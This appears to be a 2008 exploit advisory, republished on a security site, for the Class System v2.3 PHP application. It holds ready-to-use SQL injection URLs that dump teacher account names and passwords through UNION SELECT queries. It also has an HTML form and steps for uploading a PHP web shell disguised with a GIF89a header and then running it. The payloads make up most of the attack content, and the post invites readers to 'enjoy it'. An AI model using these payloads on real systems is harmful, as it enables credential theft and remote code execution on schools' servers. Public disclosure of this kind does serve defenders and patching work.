Class System v2.3 Multiple Remote Vulnerabilities

2009-04-07 / 2009-04-08
Risk: High
Local: No
Remote: Yes
CWE: CWE-89

_____ _ _ _____ _____ _____ _____ / ___| |_| | _ \| _ | _ |_ _| | (___| _ | [_)_/| (_) | (_) | | | \_____|_| |_|_| |_||_____|_____| |_| C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org _ _ _ _____ ____ ____ __ _ Hacks In Taiwan | |_| | |_ _| __| | \| | Conference 2008 | _ | | | | | (__| () | | |_| |_|_| |_| \____|____|_|\__| http://www.hitcon.org Title :: Class System v2.3 Multiple Remote Vulnerabilities Author :: unohope [at] chroot [dot] org IRC :: irc.chroot.org #chroot ScriptName :: ???????? v2.3 Download :: http://netlab.kh.edu.tw/download/classman/ClassSystemV2.zip http://netlab.kh.edu.tw/download/classman/ClassSystemV2.3.zip Mirror :: http://www.badongo.com/file/9542454 http://www.badongo.com/file/9542460 _______________ [SQL Injection] - {HomepageTop.php} - http://localhost/class/HomepageTop.php?teacher_id=-99'+union+select+0,1, teacher_password,teacher_account,4,5+from+teacher/* - {HomepageMani.php} - http://localhost/class/HomepageMain.php?teacher_id=-99'+union+select+0,t eacher_account,2,3,4,5,6,7,teacher_password+from+teacher/* - {MessageReply.php} - http://localhost/class/MessageReply.php?teacher_id=1&message_id=-99'+uni on+select+teacher_account,teacher_password,3,4+from+teacher/* ____________________ [Upload Arbitrarily] - {Apply.php} - <form enctype="multipart/form-data" action="http://localhost/class/ApplyDB.php" method="post"> <input type="hidden" name="teacher_account" value="blah1"> <input type="hidden" name="teacher_password" value="blah1"> <input type="file" name="uploadfile" size="40"><br> <input type="submit" value="send"> </form> Just upload a foo.php with GIF89a header, and go to url as following .. http://localhost/class/UploadHomepage/[your_account_id]_1.php then enjoy it .. ______ [NOTE] !! This is just for educational purposes, DO NOT use for illegal. !! # 2008/5/24 - chrO.ot group #

References:

http://xforce.iss.net/xforce/xfdb/42650
http://www.vupen.com/english/advisories/2008/1664
http://www.securityfocus.com/bid/29372
http://www.securityfocus.com/archive/1/archive/1/492583/100/0/threaded
http://www.chroot.org/exploits/chroot_uu_005
http://secunia.com/advisories/30365


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top